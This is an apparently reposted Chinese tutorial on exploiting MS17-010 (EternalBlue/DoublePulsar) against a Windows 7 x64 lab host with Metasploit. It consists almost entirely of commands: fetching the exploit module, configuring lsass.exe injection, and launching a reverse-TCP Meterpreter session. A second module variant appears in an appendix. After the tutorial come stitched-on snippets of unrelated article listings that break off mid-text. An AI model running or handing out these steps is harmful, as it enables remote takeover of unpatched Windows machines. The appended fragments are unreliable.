本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32 

用wine32执行cmd.exe

wine cmd.exe

exit        //退出

git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

启动msf,然后进行一系列设置:

service postgresql start
msfconsole

search  eternalblue
use  exploit/windows/smb/eternalblue_doublepulsar

 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset PROCESSINJECT   lsass.exeset TARGETARCHITECTURE  x64set rhost  192.168.1.105show targetsset target 9set payload windows/x64/meterpreter/reverse_tcpshow optionsset lhost 192.168.1.104exploit

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rbUse exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcpmsf exploit(ms17_010_eternalblue) >exploitMeterpreter> sysinfo

转载于:https://www.cnblogs.com/backlion/p/6804863.html

smb(ms17-010)远程命令执行之msf相关推荐

  1. NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析

    本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1.   概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的N ...

  2. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  3. Cisco Smart Install远程命令执行漏洞

    0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码.cisco Smart Install是一种" ...

  4. CVE-2019-19781 Citrix ADCNetScaler远程命令执行漏洞

    未经允许,不得擅自转载,违者必究 一.前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使 ...

  5. MS08-067 (CVE-2008-4250) 远程命令执行漏洞

    文章目录 前言 一.漏洞简介 二.影响范围 三.漏洞危害 四.本地复现 五.补丁编号 六. Windows Server 2003 SP2 中文版利用方法 七.漏洞原理深度剖析 前言 本文为08年出现 ...

  6. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

  7. exim远程命令执行漏洞分析(cve-2019-10149)

    0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...

  8. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  9. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

    0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...

最新文章

  1. 使用第三方SDK(如微信、qq、快看、头条等),调用接口405 Method Not Allowed
  2. 集中式管理助推服装企业腾飞
  3. 先进数据系统实验室(Advanced Data Systems Laboratory, ADSL)
  4. C++第五章课后习题-输入n个字符串,把其中以字母A打头的字符串输出
  5. 12 浏览器对象模型BOM
  6. 传感器模块(光敏电阻/热敏电阻/红外接收管等)介绍及使用
  7. Java项目(五子棋)
  8. 语义分割—遥感影像数据标签制作(ARCGIS)
  9. Android提取分区镜像命令,Android取证:使用ADB和DD对文件系统做镜像
  10. 锁定计算机后如何显示文字,我的电脑图标和文字后面有拖影怎么去掉
  11. springcloud以及四大神兽面试涉及知识总结(持续更新)
  12. 小程序引入阿里矢量图
  13. 有没有计算机网课,有没有电脑录制视频工具可以录制网课?
  14. html 5 压缩zip,Zip
  15. Android P系统设置之默认打开定位开关(默认使用位置服务)
  16. comsol计算机模拟过程,基于COMSOL的甲苯催化燃烧过程的数值模拟
  17. Linux环境搭建spark3 yarn模式
  18. SQL数据库的组合查询和统计查询
  19. 火星探测器纷纷上天,人类离移民火星还远吗?
  20. 美国高清晕渲地形图分享,每一幅都值得珍藏

热门文章

  1. iOS13 已越狱 iOS12.4 已越狱
  2. 直接用自己服务器做图床可以吗_我花 9 块钱搭了一个“私人图床”
  3. Sorry, user *** is not allowed to execute ‘xxxx‘ as root on ****.
  4. java 线上运维_一次java应用线上运维实战
  5. [BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
  6. [Bugku CTF——Pwn] pwn4
  7. c++内存管理-VC6
  8. 9.2.1 Renaming Retrieved Columns
  9. html格式文档结构保存数据库6,freeCAD文档结构
  10. java 有选择的查询_如何在Java中将准备好的语句用于选择查询?